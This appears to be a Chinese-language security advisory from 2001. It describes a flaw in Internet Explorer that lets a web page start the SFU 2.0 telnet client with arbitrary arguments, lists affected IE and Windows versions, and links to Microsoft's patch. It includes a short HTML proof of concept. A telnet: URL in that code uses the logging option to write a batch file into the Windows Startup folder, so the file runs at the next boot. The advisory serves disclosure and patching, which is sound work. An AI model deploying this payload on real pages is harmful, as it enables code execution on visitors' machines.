|
|
Unix (SFU) 2.0 服务的telnet客户端存在文件覆盖漏洞
发布时间:2001-10-12
更新时间:2001-10-12
严重程度:高
威胁程度:普通用户访问权限
错误类型:设计错误
利用方式:服务器模式
受影响系统Microsoft Internet Explorer 5.01
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows ME
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.0.1SP1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5SP2
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 98se
- Microsoft Windows ME
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 Terminal Services
- Microsoft Windows NT Terminal Server
- Microsoft Windows NT 3.5.1
- Microsoft Windows NT 3.5.1SP1
- Microsoft Windows NT 3.5.1SP2
- Microsoft Windows NT 3.5.1SP3
- Microsoft Windows NT 3.5.1SP4
- Microsoft Windows NT 3.5.1SP5
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
- Microsoft Windows NT Enterprise Server 4.0
Microsoft Internet Explorer 5.5SP1
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 5.5
- Microsoft Windows 95
- Microsoft Windows 98
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0SP1
- Microsoft Windows NT 4.0SP2
- Microsoft Windows NT 4.0SP3
- Microsoft Windows NT 4.0SP4
- Microsoft Windows NT 4.0SP5
- Microsoft Windows NT 4.0SP6
- Microsoft Windows NT 4.0SP6a
Microsoft Internet Explorer 6.0
- Microsoft Windows 98
- Microsoft Windows 98se
- Microsoft Windows ME
- Microsoft Windows 2000
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000 SP2
- Microsoft Windows NT 4.0SP6a 详细描述
此漏洞类似http://www.microsoft.com/technet/security/bulletin/MS01-015.asp
所描述的问题,影响了通过IE调用的telnet 会话。MS设计telnet会话可以通过IE
调用,IE可以在WEB上指定使用任意命令行来启动telnet,SFU 2.0的telnet客户端版本提供记录选项可以记录所有telnet会话中的交换信息。
攻击者可以使用这个记录选项来启动会话,然后注入可执行文件到用户系统指定为止,这样可以导致下次用户启动机器的时候执行该可执行文件,导致系统破坏。此漏洞不是存在telnet客户端本身上,而是存在于IE的问题上,因为telnet客户端不允许远程使用命令行参数。
测试代码
<html>
<frameset rows="100%,*">
<frame src=about:blank>
<frame src=telnet:-f%20\Documents%20and%Settings\All%20Users
\start%20menu\programs\startup\start.bat%20host%208000>
</frameset>
</html>
解决方案
下载补丁:
www.microsoft.com/windows/ie/downloads/critical/q306121/default.asp
相关信息
参考:http://www.microsoft.com/technet/security/bulletin/MS01-051.asp
|
